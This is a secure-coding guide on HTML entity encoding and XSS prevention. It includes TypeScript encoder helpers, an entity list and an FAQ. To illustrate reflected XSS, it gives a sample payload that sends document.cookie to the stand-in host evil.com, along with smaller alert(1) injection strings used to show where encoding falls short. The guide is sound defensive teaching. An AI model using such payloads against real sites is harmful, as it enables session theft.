HTML Entity Encoding Examples

HTML entity encoding converts characters that have special meaning in HTML into safe text representations, which browsers display as text instead of parsing as markup. The five most critical characters to encode are <, >, &, ", and '. When user input is inserted into HTML without escaping, their raw forms enable Cross-Site Scripting (XSS) attacks. This collection shows the named and numeric entity forms for the XSS-sensitive characters and for common symbols. Always HTML-encode user-provided content before inserting it into an HTML context.

XSS is consistently one of the OWASP Top 10 vulnerabilities, and missing output encoding is the root cause of most reflected and stored XSS attacks. A classic example: if your application echoes the search query back to the user as "You searched for: [query]" without encoding, an attacker can craft a URL with query=<script>document.location='https://evil.com/steal?c='+document.cookie</script>. The browser receives this literal string in the HTML response and executes the script, which sends the session cookie to the attacker's server. HTML-encoding the output (rendering < as &lt;) turns the script tag into visible text that the browser displays rather than executes.

The five XSS-critical entities every developer must know are &lt; for the less-than sign (<), &gt; for the greater-than sign (>), &amp; for the ampersand (&), &quot; for the double quote ("), and &#39; for the single quote or apostrophe ('). HTML4 defines no named entity for the single quote, so the numeric form is used. When the replacements are applied one after another, the ampersand must be encoded first: encoding < first produces &lt;, and the later & pass turns that into &amp;lt;, which the browser shows as the literal text &lt;.

Named entities such as &copy;, &reg;, and &trade; exist for common typographic symbols; they make HTML source more readable and work reliably across all browsers. Numeric entities such as &#169; (decimal) or &#xA9; (hexadecimal) work for any Unicode code point, including characters that have no named equivalent.
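A numeric reference is simply the character's Unicode code point written in decimal (&#N;) or hexadecimal (&#xH;). The TypeScript sketch below computes both forms; numericReferences is a hypothetical helper name, not part of any library.

```typescript
// Hypothetical helper: returns the decimal and hexadecimal numeric character
// references for the first code point of `ch`.
function numericReferences(ch: string): { decimal: string; hex: string } {
  // codePointAt(0) reads a whole code point, so an emoji (two UTF-16 units)
  // yields one value rather than a lone surrogate.
  const cp = ch.codePointAt(0);
  if (cp === undefined) {
    throw new Error("numericReferences expects a non-empty string");
  }
  return {
    decimal: `&#${cp};`,
    hex: `&#x${cp.toString(16).toUpperCase()};`,
  };
}

const copyright = numericReferences("©");
console.log(copyright.decimal, copyright.hex); // &#169; &#xA9;
const checkMark = numericReferences("✓");
console.log(checkMark.decimal, checkMark.hex); // &#10003; &#x2713;
```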
Prefer named entities for readability where they exist; use numeric entities for obscure characters.

Context matters when choosing what to encode. Inside an HTML attribute value delimited by double quotes, the double quote must be encoded (as &quot;) or it ends the value early; the single quote only needs encoding in single-quoted attributes, although encoding both is harmless. CSS contexts such as a style attribute follow their own syntax and escaping rules, so HTML encoding alone does not make values safe there. Inside a JavaScript event handler attribute such as onclick="...", a value needs JavaScript string escaping and then HTML encoding on top, because the browser HTML-decodes the attribute value before running it as JavaScript; mixing contexts creates bugs that HTML encoding alone cannot fix. The safest architecture avoids inline JavaScript entirely and attaches handlers with addEventListener from external scripts.

Modern web frameworks HTML-encode template expressions automatically (React's JSX, Angular's {{ }} interpolation, Django's {{ variable }}). The risk lies in bypassing that auto-encoding with raw HTML insertion APIs: React's dangerouslySetInnerHTML, Angular's [innerHTML] binding, or jQuery's .html() method. Use these APIs only with content you control, never with user-supplied data.

For rich-text input that must accept user-provided HTML (blog comment boxes, WYSIWYG editors), sanitization libraries such as DOMPurify keep an allow-list of safe tags and attributes and strip everything else. Sanitization is much harder to get right than encoding, so rely on a well-tested library rather than a custom regex-based filter.
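To make the event-handler case concrete, here is a minimal TypeScript sketch of layered encoding for an inline onclick attribute. The greet() handler and all helper names are hypothetical. JSON.stringify supplies the JavaScript string escaping, and a five-character HTML escaper supplies the attribute encoding on top. A counterexample that uses HTML encoding alone is included for contrast.

```typescript
// HTML-attribute encoder; & is replaced first so entities created by the
// later replacements are not encoded again.
function escapeHtmlAttr(value: string): string {
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Layered encoding for a hypothetical greet(name) handler:
// 1. JSON.stringify produces a JavaScript string literal (quotes, backslashes
//    and control characters escaped).
// 2. The whole handler is then HTML-attribute encoded, because the browser
//    HTML-decodes the attribute value before parsing it as JavaScript.
function onclickAttribute(name: string): string {
  const jsLiteral = JSON.stringify(name);
  return `onclick="${escapeHtmlAttr(`greet(${jsLiteral})`)}"`;
}

// Counterexample: HTML encoding alone. The browser turns &#39; back into '
// before the JavaScript runs, so the payload below still breaks out.
function onclickHtmlOnly(name: string): string {
  return `onclick="greet('${escapeHtmlAttr(name)}')"`;
}

const payload = "'); alert(1); ('";
console.log(onclickHtmlOnly(payload));
// onclick="greet('&#39;); alert(1); (&#39;')"  (decodes to greet(''); alert(1); (''))
console.log(onclickAttribute(payload));
// onclick="greet(&quot;&#39;); alert(1); (&#39;&quot;)"  (decodes to one string argument)
```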

Example

# XSS-sensitive characters (always encode)
< → &lt;
> → &gt;
& → &amp;
" → &quot;
' → &#39;

# Common symbols
© → &copy;
® → &reg;
™ → &trade;
€ → &euro;
£ → &pound;
— → &mdash;
… → &hellip;
✓ → &#10003;
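The list above can be turned into a small single-pass encoder. This TypeScript sketch is one possible way to apply it, not a reference implementation: it uses the listed forms for the characters in the list, falls back to decimal numeric references for any other non-ASCII character (as with ✓ → &#10003;), and copies plain ASCII unchanged. NAMED_ENTITIES and encodeEntities are hypothetical names.

```typescript
// Forms taken from the list above (&#39; for the apostrophe, as listed).
const NAMED_ENTITIES: Record<string, string> = {
  "<": "&lt;",
  ">": "&gt;",
  "&": "&amp;",
  '"': "&quot;",
  "'": "&#39;",
  "©": "&copy;",
  "®": "&reg;",
  "™": "&trade;",
  "€": "&euro;",
  "£": "&pound;",
  "\u2014": "&mdash;", // em dash
  "…": "&hellip;",
};

// Single pass: each code point is looked up once, so no replacement can
// re-encode the output of another (the "& first" rule does not arise).
function encodeEntities(text: string): string {
  let out = "";
  let i = 0;
  while (i < text.length) {
    const cp = text.codePointAt(i) as number;
    const ch = String.fromCodePoint(cp);
    i += ch.length; // astral characters such as emoji span 2 UTF-16 units
    const named = NAMED_ENTITIES[ch];
    if (named !== undefined) {
      out += named; // form from the list
    } else if (cp >= 0x80) {
      out += `&#${cp};`; // other non-ASCII: decimal numeric reference
    } else {
      out += ch; // plain ASCII copied unchanged
    }
  }
  return out;
}

console.log(encodeEntities(`✓ "Fish & Chips" \u2014 £5`));
// &#10003; &quot;Fish &amp; Chips&quot; &mdash; &pound;5
```

Encoding non-ASCII symbols is optional: a page served as UTF-8 can contain © or ✓ directly, while the five XSS-sensitive characters must always be encoded.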

FAQ

When must I HTML-encode user input?: Any time user-controlled data is placed inside HTML element content or attribute values; skipping this step enables XSS attacks in which attackers inject and execute malicious scripts. Data placed inside JavaScript string literals needs JavaScript escaping instead (see the last question), plus HTML encoding on top when the script sits in an attribute such as onclick.
What is the difference between named and numeric HTML entities?: Named entities like &amp; are defined in the HTML specification and are easier to read. Numeric entities like &#38; work for any Unicode code point and are understood even by older parsers that do not recognize every named entity.
Do I need to encode inside JavaScript strings in HTML?: Yes, but with a different encoding. In JSON/JavaScript contexts, escape with \u sequences or JSON.stringify. HTML entity encoding does not protect content inside <script> elements: the browser does not decode entities there, so it neither blocks JavaScript injection nor preserves the data correctly.
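For data embedded in an inline <script> element, one common approach is to serialize it with JSON.stringify and then escape <, > and & as \u003c, \u003e and \u0026. JSON.stringify alone leaves those characters untouched, so a string containing </script> would end the element early. The TypeScript sketch below uses a hypothetical jsonForScript helper and a hypothetical initialState variable.

```typescript
// Hypothetical helper: serializes data for an inline <script> element.
// JSON.stringify handles JavaScript string escaping but leaves <, > and &
// as-is; replacing them with \u escapes hides "</script>" from the HTML
// parser while the JSON stays valid.
function jsonForScript(data: unknown): string {
  const json = JSON.stringify(data) ?? "null"; // stringify(undefined) returns undefined
  return json
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026");
}

const comment = { text: "</script><script>alert(1)</script>" };
const page = `<script>const initialState = ${jsonForScript(comment)};</script>`;
console.log(page);
```

These characters can only occur inside JSON string values, so the \u escapes keep the output valid JSON that evaluates to the original data.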
